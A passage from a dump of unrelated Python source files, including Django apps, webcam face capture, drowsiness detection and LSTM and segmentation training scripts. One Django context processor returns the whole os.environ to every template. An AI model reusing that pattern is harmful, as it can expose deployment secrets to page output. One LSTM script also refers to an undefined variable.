cells_leg(coords):\r\n for i in range(len(coords)):\r\n if i==1:\r\n draw.polygon(coords[i], outline='black', fill='#f3f3f3')\r\n if i==2:\r\n draw.polygon(coords[i], outline='black', fill='#d8d8d8')\r\n if i==3:\r\n draw.polygon(coords[i], outline='black', fill='#b9b9b9')\r\n else:\r\n draw.polygon(coords[i], outline='black')\r\n#\r\n# enumerate cells\r\ndef numbers(starts):\r\n nums = range(1,164)\r\n i = -1\r\n for startpoint in starts:\r\n i += 1\r\n if len(str(nums[i]))==1:\r\n draw.text(startpoint,' '+str(nums[i]), font = font, fill = 'black')\r\n elif len(str(nums[i]))==2:\r\n draw.text(startpoint,' '+str(nums[i]), font = font, fill = 'black')\r\n\r\n else:\r\n draw.text(startpoint,str(nums[i]), font = font, fill = 'black')\r\n#\r\n# read data\r\ndef readdata(fname):\r\n res, res1 = [],[]\r\n with open(fname, 'r') as inp:\r\n for line in inp:\r\n res.append(line.split())\r\n #res.reverse()\r\n for i in range(len(res)):\r\n if len(res[i])!=0:\r\n for j in range(len(res[i])):\r\n try:\r\n res1.append('{:.4f}'.format(float(res[i][j])))\r\n except:\r\n res1.append(res[i][j])\r\n return res1\r\n#\r\n# plot data from dataset\r\ndef plotdata(dataset,coords):\r\n i = 0\r\n for startpoint in coords:\r\n draw.text(startpoint, dataset[i], font = font_large, fill = 'black')\r\n i+=1\r\n#\r\n# dataset files, enumerated from top left entry\r\nvac={160: \"439MT\", 148: \"398MO\", 124:\"353MO\"}\r\ndataset1 = readdata(input_fn1)\r\ndataset1 = [vac[int(float(i))] for i in dataset1]\r\ndataset2 = ['{: ^6.3f}'.format(float(x)) for x in readdata(input_fn2)]\r\ndataset3 = ['{: ^6.3f}'.format(float(x)) for x in readdata(input_fn3)]\r\n\r\ndataset4 = ['{: ^6.2f}'.format((float(readdata(input_fn3)[i])-float(readdata(input_fn2)[i]))/float(readdata(input_fn2)[i])*100.0) for i in range(0,len(dataset2))]\r\n\r\n#dataset5 = readdata('kq1.txt')\r\n#dataset6 = readdata('kq1.txt')\r\n#dataset7 = readdata('kq1.txt')\r\n#dataset8 = readdata('kq1.txt')\r\n\r\n#\r\n# draw a legend\r\ndef legend():\r\n half_width = ((side**2)-(0.5*side)**2)**0.5\r\n lside = 1.5*side\r\n lstart = tuple([(bottom_left[0]-7*half_width)-100, (bottom_left[1]-22*side)+200])\r\n x_num = 10\r\n y_num = 20\r\n x_dat = 100\r\n y_dat = 150\r\n x_datr = 0\r\n dstep = 70\r\n draw.polygon(single_hex(lstart,lside), outline='black')\r\n draw.text(tuple([lstart[0]-x_num, lstart[1]+y_num]), '№', font = font, fill = 'black')\r\n centry0 = tuple([lstart[0]-40, lstart[1]+40])\r\n centry1 = tuple([lstart[0]-80, lstart[1]+80])\r\n centry2 = tuple([lstart[0]-115, lstart[1]+230])\r\n centry3 = tuple([lstart[0]-40, lstart[1]+250])\r\n lentry1 = tuple([lstart[0]-130, lstart[1]+170])\r\n lentry2 = tuple([lstart[0]-100, lstart[1]+130])\r\n rentry1 = tuple([lstart[0]+15, lstart[1]+170])\r\n rentry2 = tuple([lstart[0]+40, lstart[1]+130])\r\n #\r\n draw.text(lentry1,\"набор1\", font=font_legend, fill='black')\r\n draw.text(rentry1,\"набор2\", font=font_legend, fill='black')\r\n draw.text(lentry2,\"kq\", font=font_legend, fill='black')\r\n draw.text(rentry2,\"kq\", font=font_legend, fill='black')\r\n draw.text(centry0,\"Кассеты\", font=ImageFont.truetype(isocp,25), fill='black')\r\n draw.text(centry2,\"Отклонение,%\", font=font_legend, fill='black')\r\n draw.text(centry1,\"тип ТВС\", font=font_legend, fill='black')\r\n\r\n#\r\n#\r\ncells(hex_coordinates(startpoints(bottom_left, side)), [abs(float(x)) for x in dataset4])\r\ncells_cr(cr_bank(cr_starts(startpoints(bottom_left, side))))\r\nnumbers(enumeration_startpoints(startpoints(bottom_left, side)))\r\nplotdata(dataset1,center_entries(startpoints(bottom_left, side))[0])\r\nplotdata(dataset2,left_entries(startpoints(bottom_left, side))[0])\r\nplotdata(dataset3,right_entries(startpoints(bottom_left, side))[0])\r\nplotdata(dataset4,center2_entries(startpoints(bottom_left, side))[2])\r\n\r\n\r\nlegend()\r\n#cells_leg(hex_coordinates(startpoints_leg(bottom_left, side)))\r\n#plotdata([' ТВС' for x in range(len(startpoints_leg(bottom_left, side)))],center_entries(startpoints_leg(bottom_left, side))[0])\r\n#plotdata([' 1',' 2',' 3',' 4'],center_entries(startpoints_leg(bottom_left, side))[1])\r\n#plotdata([' год' for x in range(len(startpoints_leg(bottom_left, side)))],center_entries(startpoints_leg(bottom_left, side))[2])\r\n\r\n#\r\ndel draw\r\nimage.save(output_fn, 'png')\r\n\r\n \r\n \r\n","sub_path":"картограммы/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":14116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"613436148","text":"# -* encoding: utf-8 *-\nimport warnings\n\nfrom django.apps import AppConfig\nfrom django.db.backends.postgresql.base import DatabaseWrapper as PostgreSQLDatabaseWrapper\nfrom django.db.backends.signals import connection_created\nfrom typing import Any, Type\n\n\nwarning_given = False\n\n\ndef setrole_connection(*, connection: PostgreSQLDatabaseWrapper, **kwargs: Any) -> None:\n if not isinstance(connection, PostgreSQLDatabaseWrapper):\n return\n global warning_given\n role = None\n if \"set_role\" in connection.settings_dict:\n role = connection.settings_dict[\"set_role\"]\n elif \"SET_ROLE\" in connection.settings_dict:\n role = connection.settings_dict[\"SET_ROLE\"]\n\n if role:\n connection.cursor().execute(\"SET ROLE %s\", (role,))\n\n\nclass DjangoPostgreSQLSetRoleApp(AppConfig):\n name = \"postgresql_setrole\"\n\n def ready(self) -> None:\n connection_created.connect(setrole_connection)\n\n\ndefault_app_config = 'postgresql_setrole.DjangoPostgreSQLSetRoleApp'\n","sub_path":"postgresql_setrole/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"272446614","text":"import cv2\nimport sys\nimport time;\nfrom GetData.code.align import *\ndef createFolder(label):\n import os\n path = \"image/\"+label\n try: \n os.makedirs(path)\n except OSError: \n print (\"Creation of the directory %s failed\" % path)\n else: \n print (\"Successfully created the directory %s\" % path)\ndef getData(label):\n createFolder(label)\n cascPath = \"GetData/code/haarcascade_frontalface_default.xml\"\n\n faceCascade = cv2.CascadeClassifier(cascPath)\n video_capture = cv2.VideoCapture(0)\n ftime=time.time()\n begin = time.time()\n\n while (time.time()-begin<=30):\n # Capture frame-by-frame\n \n ret, frame = video_capture.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE, \n )\n\n # Draw a rectangle around the faces \n for (x, y, w, h) in faces:\n if (time.time() - ftime >= 0.5):\n ftime=time.time()\n imageName = str(\"image/\"+label+\"/\"+time.strftime(\"%Y_%m_%d_%H_%M_%S\") + '.jpg')\n cv2.imwrite(imageName, frame)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n \n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n video_capture.release()\n cv2.destroyAllWindows()\n align_Image(label)\n# When everything is done, release the capture\n","sub_path":"GetData/code/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"582175395","text":"# -*- coding:utf-8 -*-\n\n# coding:utf8\nimport datetime\nimport time\n\n\ndef doSth():\n\n print(u'这个程序要开始疯狂的运转啦')\n\n\ndef main(h=14, m=42):\n while True:\n now = datetime.datetime.now()\n # print(now.hour, now.minute)\n if now.hour == h and now.minute == m:\n doSth()\n # 每隔60秒检测一次\n time.sleep(60)\n\n\nmain()","sub_path":"test_agent/test_tongbu/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"526526196","text":"\"\"\"\nContext processors for the Home app, which include login / registration via Userena.\n\nThese return dictionaries to be merged into a\ntemplate context. Each function takes the request object as its only parameter\nand returns a dictionary to add to the context.\n\nThese are referenced from the setting TEMPLATE_CONTEXT_PROCESSORS and used by\nRequestContext.\n\"\"\"\n\n#from django.conf import settings as django_settings\n#from django.db.models import get_models, Manager\n#from django.utils.safestring import mark_safe\n\nfrom userena.forms import SignupForm, AuthenticationForm\n\n\n#### module globals\n\ntrace = 0\n\n\n#### Context Processors\n\ndef registration_forms (request):\n return {\n 'signup_form': SignupForm,\n 'signin_form': AuthenticationForm,\n }\n\n\ndef cart_variables (request):\n from helpers import SessionHelper\n\n seshelp = SessionHelper (request.session)\n totqty, grandtot = seshelp.cart_totals()\n\n return {\n 'cart_totqty': totqty,\n 'cart_grandtot': grandtot,\n }\n\n\ndef environment (request):\n import os\n return os.environ\n","sub_path":"apps/home/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"65577406","text":"# Subject: Case Remaining Time Prediction\n# Method: LSTM (seq_len = 1, batch_size = size of events in training set, input_size = 27)\n# Feature set:\n# (1) activity_type (ont-hot encoded)\n# (2) sequence of event, debugged\n# (3) time from trace start\n# (4) weighted execution time\n\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler, RobustScaler, OneHotEncoder\nfrom sklearn.compose import make_column_transformer\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom matplotlib import pyplot as plt\n\n\"\"\"\n1. Preprocess\n\"\"\"\n\n# read data\ndf = pd.read_csv(\"./data/bpic2012_refined.csv\")\n\n# calculate trace number and lengths\nnum_of_traces = len(np.unique(df['case_id']))\ntraces_lens = df.groupby('case_id').count().seq_of_event\ntraces_lens = np.array(traces_lens)\n\n# calculate a number of activity types\nnum_of_acts = len(np.unique(df['activity_type']))\n\n# find a parting trace which is the last trace for the train/valid separation\nparting_trace_idx = int(num_of_traces * 0.8)\nparting_trace_id = np.unique(df['case_id'])[parting_trace_idx]\n\n# find a parting event's index which is the last event's index of the parting trace.\n# used as a separation line between train/valid sets\nparting_event_idx = df.loc[df['case_id'] == parting_trace_id]\\\n .index.values.astype(int)[-1]\n\n# set up the transformer (one hot encoder, feature scaler)\npreprocess = make_column_transformer(\n (OneHotEncoder(), ['activity_type']),\n (RobustScaler(), ['seq_of_event', 'time_from_trace_start', 'weighted_execution_time']),\n ('passthrough', ['case_remaining_time'])\n)\n\n# transform data and separate it into train/valid sets\ntrain = preprocess.fit_transform(df[:parting_event_idx+1]).toarray()\nvalid = preprocess.transform(df[parting_event_idx+1:]).toarray()\n\n# calculate the size of input vector\ninput_size = train.shape[1]-1 # excludes the attribute of target values\n\n# transformation (ndarray -> torch)\ndef transform_data(input_data: np.ndarray) -> (np.ndarray, np.ndarray):\n x_lst, y_lst = [], []\n size = len(input_data)\n for i in range(size - seq_len + 1):\n # input sequence\n seq = input_data[i:i+seq_len, :input_size]\n # target values of current time steps\n target = input_data[i+seq_len-1, -1]\n x_lst.append(seq)\n y_lst.append(target)\n x_arr = np.array(x_lst)\n y_arr = np.array(y_lst)\n print(\"[INFO]x_arr.shape = \" + str(x_arr.shape))\n print(\"[INFO]y_arr.shape = \" + str(y_arr.shape))\n return x_arr, y_arr\n\n\n# select device between gpu and cpu\ndtype = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.float\n\nseq_len = 10\nbatch_size = 100\n\nx_train, y_train = transform_data(train)\nx_valid, y_valid = transform_data(valid)\n\n# calculate a number of batches\nnum_batches = int(x_train.shape[0] / batch_size)\n\nif x_train.shape[0] % batch_size != 0:\n num_batches += 1\n\n\n\"\"\"\n2. Model Definition\n\"\"\"\n\n# hyperparameters setup\nhidden_size = 150 # default: 32\noutput_dim = 1\nnum_layers = 3 # default: 2\nlearning_rate = 1e-3 # default: 1e-3\nnum_epochs = 200 # default: 200\n\n# the LSTM model\nclass LSTM(nn.Module):\n def __init__(self, input_dim, hidden_dim, batch_size, output_dim=1, num_layers=2):\n super(LSTM, self).__init__()\n self.input_dim = input_dim\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.seq_len = 0\n self.num_layers = num_layers\n # define the LSTM layer\n self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers)\n # define the output layer\n self.linear = nn.Linear(self.hidden_dim, output_dim)\n def init_hidden(self):\n # initialize hidden states\n return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).type(dtype),\n torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).type(dtype))\n def forward(self, input):\n # forward pass through LSTM layer\n lstm_out, self.hidden = self.lstm(input) # [1, batch_size, 24]\n # only take the output from the final time step\n y_pred = self.linear(lstm_out[:, -1])\n return y_pred.view(-1)\n\nmodel = LSTM(input_size, hidden_size, batch_size=1, output_dim=output_dim, num_layers=num_layers)\nmodel.seq_len = seq_len\nif torch.cuda.is_available() == True:\n model.cuda() # for cuda\n\nloss_fn = torch.nn.L1Loss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\n\"\"\"\n3. Train the Model\n\"\"\"\n\nhist = np.zeros(num_epochs) # loss history\nfor t in range(num_epochs): # for each epoch\n# for t in range(1): # [TEST]\n y_pred = np.empty(0)\n for i in range(num_batches): # for each batch\n print(\"Training the model: %d/%dth epoch, %d/%dth batch...\"\n % (t + 1, num_epochs, i + 1, num_batches), end='\\r')\n # last batch\n if i == num_batches-1:\n x_batch_arr = x_train[i*batch_size:]\n y_batch_arr = y_train[i*batch_size:]\n # other batches\n else:\n x_batch_arr = x_train[i*batch_size:i*batch_size+batch_size]\n y_batch_arr = y_train[i*batch_size:i*batch_size+batch_size]\n # transformation (ndarray -> torch)\n x_batch = Variable(torch.from_numpy(x_batch_arr).float()).type(dtype)\n y_batch = Variable(torch.from_numpy(y_batch_arr).float()).type(dtype)\n model.batch_size = x_batch.shape[0]\n model.hidden = model.init_hidden()\n # get predictions for the batch\n pred_i = model(x_batch)\n # forward pass\n loss_train = loss_fn(pred_i, y_batch)\n # zero out gradient, else they will accumulate between epochs\n optimizer.zero_grad()\n # backward pass\n loss_train.backward()\n # update parameters\n optimizer.step()\n # store the predictions\n y_pred = np.append(y_pred, pred_i.detach().cpu().numpy(), axis=0)\n if t == 0:\n loss_prev = float('inf')\n else:\n loss_prev = hist[t-1]\n # measure a loss in the current epohch\n loss_train = loss_fn(torch.from_numpy(y_pred), torch.from_numpy(y_train)).item()\n print(\"[INFO] Epoch \", t, \", Loss: \", loss_train, \", Difference: \", (loss_train - loss_prev))\n hist[t] = loss_train\n\n\n# # deprecated (the divide by zero problem)\n# def mean_absolute_percentage_error(y_obs, y_hat):\n# y_obs, y_hat = np.array(y_obs), np.array(y_hat)\n# return np.mean(np.abs((y_obs - y_hat) / y_obs)) * 100\n#\n#\n# loss_mape = mean_absolute_percentage_error(y_train, y_pred)\n\ndef weighted_mean_absolute_percentage_error(y_obs, y_hat):\n y_obs, y_hat = np.array(y_obs), np.array(y_hat)\n return np.abs(y_obs - y_hat).sum() / y_obs.sum()\n\nwmape = weighted_mean_absolute_percentage_error(y_train, y_pred)\n\n\n\"\"\"\n4. Visualization\n\"\"\"\n\n# default visualization setup\nplt.figure(dpi=100) # set the resolution of plot\n# set the default parameters of visualization\ncolor_main = '#2c4b9d'\ncolor_sub = '#00a650'\ncolor_ssub = '#ef9c00'\ncolor_sssub = '#e6551e'\nfont_family = 'Calibri'\nplt.rcParams.update({'font.family': font_family, 'font.size': 23, 'lines.linewidth': 1,\n \"patch.force_edgecolor\": True, 'legend.fontsize': 18})\n\n# calculate residual errors\nerr_func = lambda x, y: abs(x - y)\nerrors = err_func(y_train, y_pred)\n\n# line plot\n# plt.plot(errors, label=\"Residual Errors\", kind='bar')\nplt.plot(y_train, label=\"Actual Data\")\nplt.plot(y_pred, label=\"Predictions\")\nplt.legend(loc='best')\nplt.show()\n\n# visualize scatter plot\nfig, ax = plt.subplots()\nax.scatter(y_train, y_pred, 10) # 10: marker size\nax.plot([y_train.min(), y_train.max()], [y_train.min(), y_train.max()], 'k--', lw=2)\nax.set_xlabel('Actual Data')\nax.set_ylabel('Predictions')\nplt.show()\n\n# visualize scatter plot of filtered data\nfiltered_data_index = df.loc[df['seq_of_event'] <= 1].index\n# filtered_data_index = df.loc[(df['seq_of_event'] > 1) & (df['seq_of_event'] < 10)].index\n# filtered_data_index = df.loc[df['seq_of_event'] > 15].index\ny_train_filtered = list()\npred_filtered = list()\nfor i in range(filtered_data_index.size):\n y_train_filtered.append(y_train[i])\n pred_filtered.append(pred[i])\n\ny_train_filtered = np.asarray(y_train_filtered)\npred_filtered = np.asarray(pred_filtered)\n\nfig, ax = plt.subplots()\nax.scatter(y_train_filtered, pred_filtered, 10) # 10: marker size\nax.plot([y_train_filtered.min(), y_train_filtered.max()], [y_train_filtered.min(), y_train_filtered.max()], 'k--', lw=2)\nax.set_xlabel('Actual Data')\nax.set_ylabel('Predictions')\nplt.show()\n\n# visualize training loss\nplt.plot(hist, label=\"Training loss\")\nplt.legend(loc='best')\nplt.show()\n\n","sub_path":"venv/crt_prediction_lstm_16.py","file_name":"crt_prediction_lstm_16.py","file_ext":"py","file_size_in_byte":8645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284630876","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport dlib\nimport numpy\n\nfrom scipy.spatial import distance as dist\nfrom imutils import face_utils\n\n# define two constants, one for the eye aspect ratio to indicate\n# blink and then a second constant for the number of consecutive\n# frames the eye must be below the threshold\nEYE_AR_THRESH = 0.27\nEYE_AR_CONSEC_FRAMES = 2\nMOUTH_YA_CONSEC_FRAMES=9\nMOUTH_YAWNING_THRESH=0.7\n\nDAT_FILENAME = 'shape_predictor_68_face_landmarks.dat'\n\n# grab the indexes of the facial landmarks for the left and\n# right eye, respectively\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n(mStart,mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\n\ndef eye_aspect_ratio(eye):\n # compute the euclidean distances between the two sets of\n # vertical eye landmarks (x, y)-coordinates\n A = dist.euclidean(eye[1], eye[5])\n B = dist.euclidean(eye[2], eye[4])\n\n # compute the euclidean distance between the horizontal\n # eye landmark (x, y)-coordinates\n C = dist.euclidean(eye[0], eye[3])\n\n # compute the eye aspect ratio\n ear = (A + B) / (2.0 * C)\n\n # return the eye aspect ratio\n return ear\n\ndef detect_yanwing(mouth):\n A=dist.euclidean(mouth[2],mouth[10])\n B=dist.euclidean(mouth[3],mouth[9])\n C=dist.euclidean(mouth[4],mouth[8])\n D=dist.euclidean(mouth[0],mouth[6])\n E=dist.euclidean(mouth[1],mouth[5])\n F=dist.euclidean(mouth[11],mouth[7])\n yanwing_ratio=(A+B+C)/(D+E+F)\n return yanwing_ratio \n\ndef showPose(im, image_points): \n # 3D model points.\n model_points = numpy.array([\n (0.0, 0.0, 0.0), # Nose tip\n (0.0, -330.0, -65.0), # Chin\n (-225.0, 170.0, -135.0), # Left eye left corner\n (225.0, 170.0, -135.0), # Right eye right corne\n (-150.0, -150.0, -125.0), # Left Mouth corner\n (150.0, -150.0, -125.0) # Right mouth corner\n \n ])\n # Camera internals\n size=im.shape\n focal_length = size[1]\n center = (size[1]/2, size[0]/2)\n camera_matrix = numpy.array(\n [[focal_length, 0, center[0]],\n [0, focal_length, center[1]],\n [0, 0, 1]], dtype = \"double\"\n )\n \n #print (\"Camera Matrix :\",camera_matrix)\n dist_coeffs = numpy.zeros((4,1)) # Assuming no lens distortion\n (success, rotation_vector, translation_vector) = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs, flags=cv2.SOLVEPNP_ITERATIVE) \n\n # Project a 3D point (0, 0, 1000.0) onto the image plane.\n # We use this to draw a line sticking out of the nose\n (nose_end_point2D, jacobian) = cv2.projectPoints(numpy.array([(0.0, 250, 800.0)]), rotation_vector, translation_vector, camera_matrix, dist_coeffs)\n for p in image_points:\n cv2.circle(im, (int(p[0]), int(p[1])), 3, (0,0,255), -1)\n p1 = ( int(image_points[0][0]), int(image_points[0][1]))\n p2 = ( int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))\n distance=dist.euclidean(p1,p2) \n cv2.line(im, p1, p2, (255,0,0), 2)\n\n return im ,distance\n\ndef process_frame(detector,predictor,gray_frame):\n eyes_open = True\n looking_forward = True\n distance=0\n frame = []\n # detect faces in the grayscale frame\n \n rects = detector(gray_frame, 0)\n #print(rects)\n # We now need to loop over each of the faces in the frame and \n # then apply facial landmark detection to each of them\n if len(rects) > 0:\n for rect in rects:\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n \n shape = predictor(gray_frame, rect)\n \n shape = face_utils.shape_to_np(shape)\n\n image_points=numpy.array([\n shape[30], # Nose tip\n shape[8], # Chin\n shape[45], # Left eye left corner\n shape[36], # Right eye right corne\n shape[54], # Left Mouth corner\n shape[48] # Right mouth corner\n ], dtype='double')\n\n frame, distance=showPose(gray_frame, image_points)\n \n # extract the left and right eye coordinates, then use the\n # coordinates to compute the eye aspect ratio for both eyes\n leftEye = shape[lStart:lEnd]\n rightEye = shape[rStart:rEnd]\n mouth=shape[mStart:mEnd]\n leftEAR = eye_aspect_ratio(leftEye)\n rightEAR = eye_aspect_ratio(rightEye)\n yawningRatio=detect_yanwing(mouth)\n \n # average the eye aspect ratio together for both eyes\n ear = (leftEAR + rightEAR) / 2.0\n\n # compute the convex hull for the left and right eye, then\n # visualize each of the eyes\n leftEyeHull = cv2.convexHull(leftEye)\n rightEyeHull = cv2.convexHull(rightEye)\n mouthHull=cv2.convexHull(mouth)\n cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame,[mouthHull],-1,(0,255,0),1)\n\n # check to see if the eye aspect ratio is below the blink\n # threshold, and if so, increment the blink frame ounter\n # @TODO\n # if yawningRatio>MOUTH_YAWNING_THRESH:\n # mouthCounter+=1\n # else:\n # mouthCounter=0\n # if mouthCounter>=MOUTH_YA_CONSEC_FRAMES:\n # totalYawn+=1\n # mouthCounter=0\n\n # if lower, eyes are closed\n if ear < EYE_AR_THRESH:\n eyes_open = False\n \n # # otherwise, the eye aspect ratio is not below the blink\n # # threshold\n # else:\n # # if the eyes were closed for a sufficient number of\n # # then increment the total number of blinks\n # if COUNTER >= EYE_AR_CONSEC_FRAMES:\n # TOTAL += 1\n\n # # reset the eye frame counter\n # COUNTER = 0\n # draw the total number of blinks on the frame along with\n # the computed eye aspect ratio for the frame\n\n # if no rects, then looking away\n print(distance)\n if len(rects) > 0:\n if distance < 200:\n looking_forward = True\n else:\n looking_forward = False\n else:\n looking_forward = False\n \n if len(frame) > 0:\n cv2.putText(frame, \"eyes open: {}\".format(eyes_open), (10, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"EAR: {:.2f}\".format(ear), (300, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame,\"yawning:{}\".format(3),(10,60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"looking ahead?: {}\".format(looking_forward), (300, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n #show the frame\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n return (eyes_open, looking_forward)\nvc = cv2.VideoCapture(0)\nvc.set(3,640)\nvc.set(4,480)\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(DAT_FILENAME)\nwhile True:\n ret, frame = vc.read()\n eyes_open,looking_forward=process_frame(detector,predictor,frame)\n","sub_path":"safe_driving/src/face_reader.py","file_name":"face_reader.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372471631","text":"import csv\n\n\n\ndef go_files():\n\treader = csv.reader(open('Fonti/file.csv', 'r', newline='', encoding='latin-1'), delimiter=';')\n\tnext(reader)\n\tfor line in reader:\n\t\tyield {\n\t\t\t'operazione': line[2],\n\t\t\t'atto': line[3],\n\t\t\t'anno': line[4],\n\t\t\t'data_atto': line[5],\n\t\t\t'rgnr': line[6],\n\t\t\t'rg_gip': line[7],\n\t\t\t'sentenza': line[8],\n\t\t\t'tribunale': line[9],\n\t\t\t'sezione': line[10],\n\t\t\t'pm': line[11],\n\t\t\t'imputati': line[12],\n\t\t\t'oc': line[13],\n\t\t\t'cosca': line[14],\n\t\t\t'zona': line[15],\n\t\t\t'reati': line[16],\n\t\t\t'pagg': line[17],\n\t\t\t'nome': line[18],\n\t\t}","sub_path":"importafonti.py","file_name":"importafonti.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"575496761","text":"import numpy as np\nimport pandas as pd\nimport random\nimport os\nimport datetime\nfrom collections import OrderedDict\nfrom typing import List\nfrom apex import amp\n\nimport time\nimport copy\nimport torch\nfrom torchvision import models\nimport segmentation_models_pytorch as smp\n\nfrom data_loader import *\nfrom augmentation import *\nfrom imblearn.over_sampling import SMOTE\n\n\nBASE_DIR = '../../../input'\nSEED = 2019\nNUM_FOLD = 0\nBATCH_SIZE = 32\nLR = 4e-4\nEPOCHS = 100\nEARLY_STOP_PATIENCE = 15\nREDUCE_LR_FACTOR = 0.25\nREDUCE_LR_PATIENCE = 7\nREDUCE_LR_MIN = 1e-6\nOPT_LEVEL = 'O1'\nPATH_WEIGTS = './weights_and_logs/model_wa_fold_%d.pt'%NUM_FOLD\nPATH_CHECKPOINTS = [f'./weights_and_logs/model_wa_{x}_fold_{NUM_FOLD}.pt' for x in range(5)]\nPATH_WEIGTS_PRETRAIN = './weights_and_logs/model_fold_%d.pt'%NUM_FOLD\n\n\ndef seed_everything(seed=1234):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n \n \ndef get_metrics(true, pred):\n _pred = np.empty(shape=(4,256,1600))\n for i in range(5):\n _pred[:,:,i*320:i*320+320] = pred[i]\n \n dice_pos, dice_neg = [], []\n for i in range(_pred.shape[0]):\n p = _pred[i,:,:].reshape(-1,)\n t = true[i,:,:].reshape(-1,)\n\n if t.max() == 1:\n dice_pos.append((2 * (p * t).sum()) / (p.sum() + t.sum()))\n dice_neg.append(np.nan)\n else:\n dice_pos.append(np.nan)\n dice_neg.append(0 if p.max() == 1 else 1)\n\n return dice_pos, dice_neg\n\ndef evaluate_model(model, dataloaders, device):\n model.eval()\n\n dice_pos, dice_neg = [], []\n for inputs, labels in dataloaders['val']:\n inputs = inputs[0].to(device)\n labels = labels[0].to(device)\n\n with torch.no_grad():\n outputs = model(inputs)\n outputs = torch.sigmoid(outputs)\n preds = (outputs > 0.5).long()\n \n _dice_pos, _dice_neg = get_metrics(labels.data.cpu().numpy(), \n preds.data.cpu().numpy())\n dice_pos.append(_dice_pos)\n dice_neg.append(_dice_neg)\n \n metrics_val = 0.5 * np.nanmean(dice_pos) + 0.5 * np.nanmean(dice_neg)\n \n return metrics_val, dice_pos, dice_neg\n\n\ndef train_model(model, criterion, optimizer, dataloaders, dataset_sizes, \n scheduler, device, num_epochs=25, early_stop_patience=15):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_metrics = 0.0\n early_stoping = 0\n wa_index = 0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n model.train()\n running_loss = 0.0\n\n # Train part\n for inputs, labels in dataloaders['train']:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n with torch.set_grad_enabled(True):\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n \n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n\n optimizer.step()\n\n running_loss += loss.item() * inputs.size(0)\n\n epoch_loss_train = running_loss / dataset_sizes['train']\n \n # Valid part\n optimizer.zero_grad()\n metrics_val, dice_pos, dice_neg = evaluate_model(model, dataloaders, device)\n \n print('train loss: {:.4f}'.format(epoch_loss_train))\n print('val_dice:', np.round(metrics_val, 3), \n 'val_dice_pos:', np.round(np.nanmean(dice_pos, axis=0), 3), \n 'val_dice_neg:', np.round(np.nanmean(dice_neg, axis=0), 3))\n \n if metrics_val > best_metrics:\n print('*')\n best_metrics = metrics_val\n best_model_wts = copy.deepcopy(model.state_dict())\n torch.save(best_model_wts, PATH_CHECKPOINTS[wa_index])\n early_stoping = 0\n wa_index = wa_index + 1 if wa_index < 4 else 0\n else:\n print()\n early_stoping += 1\n \n if early_stoping > early_stop_patience:\n break\n \n scheduler.step(metrics_val)\n print()\n \n with open('./weights_and_logs/logs.txt','a') as f:\n 